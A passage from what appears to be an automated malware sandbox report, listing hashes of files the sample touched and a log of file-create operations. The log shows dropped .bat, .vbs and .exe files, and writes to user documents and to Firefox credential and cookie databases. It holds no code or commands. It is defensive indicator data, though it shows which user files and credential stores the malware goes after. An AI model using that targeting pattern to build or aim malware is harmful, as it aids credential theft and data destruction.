cdb21310b58b551dcaf960094f280c03
SHA1: 96dcc71aaa40fe0b096af4eb3f3db99bad5cdcbc SHA256: 527fa53aa0f9f6c5cec39b87a2479769066427138fb43dfcf7ebf32baa6b63af SSDeep: 768:/10IJ4K2qSmFiJf3Vp095zL5anQaMgPyIc753J9N31Lk31TS+9vuPX4vqMCHUBDa:9SmFiJtpWdanQaM0KL9LLaDvgGqUBD |
|
|
| C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\chrome.7z | 10.00 MB |
MD5:
e7a4c54bb2d4bd2320c6a38650bae911
SHA1: fa4b02cf57d8acf7a40101d8f0144e69bab278fd SHA256: e1af0d922170ede60d307c1d1cbed90dc54c16796698ac49abba00e42728a5cd SSDeep: 196608:dKgBSgnF8hi2a7hKIG7m0ZctRi13CUPty2AZoO:fdC+74o/zi1Z12Zv |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightRegular.ttf | 338.21 KB |
MD5:
5027e71fc3edfec550eab8c8eeeba88d
SHA1: 8dfbabd8606dbec8cc2b07bb598feefcba91e16d SHA256: dbdb239d7051e15da8a4a5a85c4cb7ec6bd36f66012505f0f761d112c1b7b95a SSDeep: 6144:e6TYUBN4AUG2CCTufrmOufymM8hvFHp277tS9iZFYSATxNR:e6TYUBNYvCCTcaFNJw7tSgYS8 |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster2x.jpg | 83.86 KB |
MD5:
86504f5a24ab1f36d723352e8eb5b319
SHA1: bfdba63bacba78dc4e19c076b05e2a0bbed44778 SHA256: 7d66e4e0f62cdc006abb09257e7d7d752f1bce26986ee060e02a988adfaad94b SSDeep: 1536:CYPaZj3pRoJpMulm4IVRppppudICBTOnQLfV5ZhEwDsR4444W8Rxu+Amj8QUO:zPUjjIwIxOufV7hB8Rxuk |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations_retina.png | 11.52 KB |
MD5:
5af5ca3922501061157d25aa2edaf827
SHA1: d50221b64f448ef5f537abcf9a8e3c90cc17e1bc SHA256: 428d2c00dbfd6d6dfcc2f81df9032226b807188ed6b1f17476802a0166188b73 SSDeep: 192:uBqyZIjH8K0nsa8N+0F+syYoo3qqSuALwxS2GgP288qPWIW9ovFj+JBJPy29cjJJ:uBqqgcQl+sPoo3L6LwKw2jqO7+FCJfyg |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\optimize_poster2x.jpg | 66.71 KB |
MD5:
3f6650432296d8fe449271caab130cc9
SHA1: 1583ec60630e0b6c7716e8f636b30787f9ea91ac SHA256: 4e255909e2fa5e4fbf064b293329ad8b52c3a2ab521224a4869e17895dbdb48f SSDeep: 1536:FSXTFHlbQGbZ3wl/jstnJ577CvNtj5RSLGCJzlynUQ/lmK:4TNNUgV78BRSLxG/l |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\AppCenter_R.aapp | 1.67 KB |
MD5:
c81c53c417d9a19887155d5706851cec
SHA1: 4c501e60732e81ef874ab7c9b40d6ec43d87143a SHA256: 206827ad615110d3984edde9259a11a0c1e1b06380280bcbd513d45d90ac2029 SSDeep: 24:4T7xK0iwNvfIa9tOi3DC2fC9yUTH3G+ETFlvmqLaWHNyuXHOD47SsdeK5GZsCMDI:4/xN3jtOUDdUyi2XmqL7Nx+DqNNRz |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInTray.gif | 2.36 KB |
MD5:
7ec9e63ae9f8ebd202b5d74f678c94ac
SHA1: e12b56d9c8eebd7af10aaa83ef356bf28029dc74 SHA256: 147e9ebb6ea9ec2279f4cd13664d893fc77de111f4480b484b769a4478bead49 SSDeep: 48:+2Mlwc8vpKSK76py/yUoBFDdUyi2XmqL7Nx+DqNNRzsE:3MyHvpYG4KFDdUoXmzq/Vb |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Measure.aapp | 1.95 KB |
MD5:
5c50aedd8beb685a10cd57fb8b8529e8
SHA1: 973902a7e272e34e15e23a1995ce997e2d8eaad1 SHA256: b8134c4d79b79032ebc788db06efc3acd09d672f316bdd4ab502c8ea9080088f SSDeep: 48:372rNhUYSeJnjDdUyi2XmqL7Nx+DqNNRz:3CBDdUoXmzq/V |
|
|
| C:\Program Files\Java\jre1.8.0_131\release | 1.90 KB |
MD5:
4f6be199c6bb2a1ce5e767581483ad10
SHA1: f281e4fbb694002d0e8d9ee801ce6fea27a7e3af SHA256: e6faf181f088c54b340a94a3f3d8519a1ec4c2868a62d4a8d788f8f71e926a0f SSDeep: 24:kltECwQVLfx5p2gtTodgL3DC2fC9yUTH3G+ETFlvmqLaWHNyuXHOD47SsdeK5GZO:OtVD/og2gDDdUyi2XmqL7Nx+DqNNRzT |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\fontconfig.properties.src | 11.70 KB |
MD5:
c0e09b0bd9f6db2302ede461fb5a2e98
SHA1: db5313b8f3adcb5d7121a53eea894311b89d297f SHA256: 2fe266976c7021462152bccc5982e160cdb1e52871080f4b20b70c20eb943826 SSDeep: 192:mwoGq7NPDD5d0c+5ZaO/Ywca9nBsMbHk2VBFEqzhqTfomz0nnS2R:po7NL/qR9BsMNrFEMqTfgnS |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf | 80.14 KB |
MD5:
7fb60e4087b585e8803e25f183f6d807
SHA1: d7c385edef8022e2b126a898553c9d4b30d245d5 SHA256: df01ef9d23c55cbba8d8697f400075ad4717c1c180492bb9cb0fc26ee38af95b SSDeep: 1536:siVTk3hLaQwY+70umYYBN9ELwracFbpE86GD+XDKAFoL/osl7ig:dVT65FGS0P80XXoLz7ig |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash_11-lic.gif | 9.00 KB |
MD5:
b98a8d7e2487c30b9798721d66e16b32
SHA1: 8b9d240af3bd7e2f13665c5af60b1f79b8ce10d2 SHA256: ed1702c05f37ca5736d7e161f77e4cf93f9f8ee802f6aa3d299c28d9a98409f1 SSDeep: 192:MsVGsEi+kPqLRUY3+oOJOu5TY24xBfm7ZzEwSXQRUrF6Y9S2R:xMi+IqLqYIYuR2vfmxZi66S |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\pmd.cer | 1.79 KB |
MD5:
e3f3e592366ddc128c6c7939c0fc89ff
SHA1: 754cd109a0ed2e1ea78361a2d831665ca292e7df SHA256: e4f9a7d4e6308f9014014c120a51f18e936eff5b448077f111c3bb41bf153655 SSDeep: 24:BWvN5rYPId0fiyD1R/cF3DC2fC9yUTH3G+ETFlvmqLaWHNyuXHOD47SsdeK5GZso:gkTR7cNDdUyi2XmqL7Nx+DqNNRzCt |
|
|
| C:\Users\CIiHmnxMn6Ps\Documents\wuVGSEK6-dXTTsU\U4X3q\Y8pV9AChJ06DJzy_uS.xlsx | 41.52 KB |
MD5:
10c103d08a99c5fede85327b3e8e2da9
SHA1: 2127795d2888faac5e9f2095ebf81d73c5667c40 SHA256: c6f3055c8ded8fd7947deeb61f408a0be3e2543a9916a455dd8ba51cba694202 SSDeep: 768:bbBj4poixAfVyWCtgrN+tlp6xsoOZFY1citds7sRSOU:blj4RopCtwEtlp7ZFYGgds7jOU |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\amd64\jvm.cfg | 2.00 KB |
MD5:
72b61f20552fe1efa103896f7b617bff
SHA1: 9adf60effedd6bfdb4ff8615361e81c45b4feac6 SHA256: ec244751562205871b1453bf35b796536026e584b1ee4ae14d04ab00445f847d SSDeep: 48:1YIpfSy5yBeCDdUyi2XmqL7Nx+DqNNRzU:R5yB9DdUoXmzq/V |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Protect_R_RHP.aapp | 1.81 KB |
MD5:
3d5d836bccc671b3e6a0c0bbfea6f5f4
SHA1: 0e03ff66e462cb5000ad384637094f3944e6d1fa SHA256: ab1ea870adc2c9ea87eff320b556949d1404b1aa8060a6a57a7c491996058d66 SSDeep: 48:+BSeQTzC3HKCyLnN9DdUyi2XmqL7Nx+DqNNRzg+:cdQTzC3dyLN9DdUoXmzq/Vg+ |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp | 268.88 KB |
MD5:
030875ea4fa85d4c6999b91db306cdd4
SHA1: 186ae9a9aa273890d2a5b0fec556dafc5d26968e SHA256: 724ebe49cee17f72c2208c4786f67eec4e0dca7bd1c8f3eb1221c23713f6a23d SSDeep: 1536:S8v3huhvtklAyOqBLOEGWS7Rrp6huBUR4pVmlqPRLpaBOh0Rjpy5m5sR4pVmlqXE:P0tqAy5qVj6xd7sZ |
|
|
| C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\webappsstore.sqlite | 97.38 KB |
MD5:
5af7557564226a1f8459b4073b68c12f
SHA1: 822276fb40303a1c0404ec38a7217d76063fb388 SHA256: 39bb228767d6bf94b7cf08b552bb96a9e5eb206f4c517c4e99785b0722fb34de SSDeep: 384:dKd8YYnFF5Y6tEJvjsklJkAQo018r4WGbs5LDMs2XKd8YYnFF5/S:dKd8YYFvtovrlJkroPriYLIlKd8YYF |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\meta-index | 3.46 KB |
MD5:
048894d67831efcc67738a941a14e640
SHA1: 2724222db2b8150ac391f3785ddb91efb4b25370 SHA256: 7496121599cfec5040f0b912ef59ec40c67f063840b2cc770d46e0784ab9db21 SSDeep: 96:qnRJ9HEtiepNa5uobUZH1uP3DdUoXmzq/V:qn39HEMepNa5uo4ZVOS2R |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\protect_poster.jpg | 24.18 KB |
MD5:
17b151a4b6e005ed332e3d6f9bfacb60
SHA1: 816a563b5d9362c1aecafff5038b359d78730567 SHA256: 335a7fce8bd5a8c2f97b22da9859168d3b62883eac698216a94bef2ad8ab4f91 SSDeep: 384:l3wcgzYUJ11IDyyv9oigUgrulKpCRqWgso58n3CQKX7BpB4US:l5g8UdI+g9oP4K0Rxgsp3CNXtpG |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Search.api | 422.48 KB |
MD5:
f613fef26d1d677030b50da95e64647d
SHA1: 85e63bb277988fc5567a07dbeec7eb244790cdcc SHA256: 97525e272dab47062ee01cc59b6db6a989318e298225c9dcc4428c733f900923 SSDeep: 6144:pkrishkWh9+dVMSJQdIOrS4qFK5eZQ7j7CQMb7BcSXNuumhzTHCVOo521T/c:GrFOKSCdpjQrm7POb7tdu1hz2Vj |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DigSig.api | 1.27 MB |
MD5:
7403023afb156df184a998857468c0c8
SHA1: 049f1bff04b5272dec5b39dff29cee0633a0f4a4 SHA256: 48cb3d601b416bd69b154e4bdc580be558ca6ca5fe2754a5221b4fe46e589858 SSDeep: 24576:XrrNrO1GUZOwNMzaypiXVTTMOzQtIb/EFKbxRdK2hDeO:XyGG7si/zQC/EFKbxRdzeO |
|
|
| C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx | 3.54 MB |
MD5:
e4b6c4d149a16feb8363206d18a8cf4d
SHA1: b05ff195002fef10834bfa9e3521a5ec0d8ae5ef SHA256: 1ee2d34d8a2727ed58acac9507bb780b7402f5b0d3177b52840f16066cd8eb6a SSDeep: 98304:6HR9Na7kNEeEukdHe3mBQlqZ7kNEeEukdHe3mBQlqgNsf8P854annqjGaGahP:mK7kHbkdHe3p+7kHbkdHe3pDsEPuDn92 |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\jfr\profile.jfc | 20.98 KB |
MD5:
f6a5efeeedf0ed89b44ef781fe597597
SHA1: 4320309521884a7f70af9bdc86629d932464130d SHA256: 5ec1f511c928847aca11018fbd5e825566ee23a24fad874ca5b104a4ef4e811d SSDeep: 384:mu0K7eqyb35va3Famd79MbhuDIfLqO2vS:mxqybMxd |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Exp_RHP.aapp | 1.78 KB |
MD5:
dc9c4a45f6fae623a3028ef7af582bb0
SHA1: c3780ba4262fa75bffbb7073f17621153af23263 SHA256: 869ab9c213be90c4f56fa1a85a28435c136f8e080e0d1ac4e7506a3d044948b1 SSDeep: 48:HnBBIs3+QiV/SDdUyi2XmqL7Nx+DqNNRz2:HB2s3+QEKDdUoXmzq/V |
|
|
| C:\Program Files\Java\jre1.8.0_131\bin\javaws.exe | 312.45 KB |
MD5:
f210fc22745e604e12aad110e4182b86
SHA1: a65a9ef5190ae59d8545d0f754e1e7e36b517b94 SHA256: c1876ab5e7b26581c134030075c52bd139a482fdb578c8c508ae10e74de72b50 SSDeep: 6144:4NO+UbxSEMw7O+WW5T2B/1ghTBRm35i9OMOHi/v0:4NabxSEMw715Q1gH/v |
|
|
Host Behavior
File (5461)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\ALL_dmp.fldp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\log.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\iTIcBPF1.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\QvaXf73S.bat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\TpKMXrXl.vbs | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\OfflineCache\index.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\content-prefs.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\webappsstore.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\I2B-IpFsb9idfCLtVwY.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\ylAwFKg5McaHxLdfCw\V26eVK1EEz0-Yv9 CPjG\juS7-iVxInAFvmKlIbQ.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\wuVGSEK6-dXTTsU\urTwF5-3dzsORJdKllA\dQF_A.doc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\secmod.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\wuVGSEK6-dXTTsU\U4X3q\Y8pV9AChJ06DJzy_uS.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\yJCcTFulMwOFf.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\DIv3goBywC.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\yjQnJm5AX.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\JNnG1JO5YewtO\F0FB8Vy6u9.doc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\key3.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\ylAwFKg5McaHxLdfCw\V26eVK1EEz0-Yv9 CPjG\Yfo4Nm04yK g4eJDV\QY3uR5.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\ylAwFKg5McaHxLdfCw\V26eVK1EEz0-Yv9 CPjG\beTgSQs.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cert8.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\combine_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\protect_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\ylAwFKg5McaHxLdfCw\IC8b3K-Ck1Of.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster2x-dark.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\compare_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\formhistory.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\kinto.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\permissions.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\protect_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\compare_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\places.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\combine_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\oPfhKxbB7.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\K-1ayDQ8Ez-MJ88.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\fybVq7xCgPHQ.ods | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\lgenTngN.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\FjtaxDI8V4.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\wuVGSEK6-dXTTsU\1H l9 Sk6KE_oToG r\0BT46_.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\wuVGSEK6-dXTTsU\urTwF5-3dzsORJdKllA\tCdykvzCdkYy-sso.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\JNnG1JO5YewtO\wjXw6Pgi.ods | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
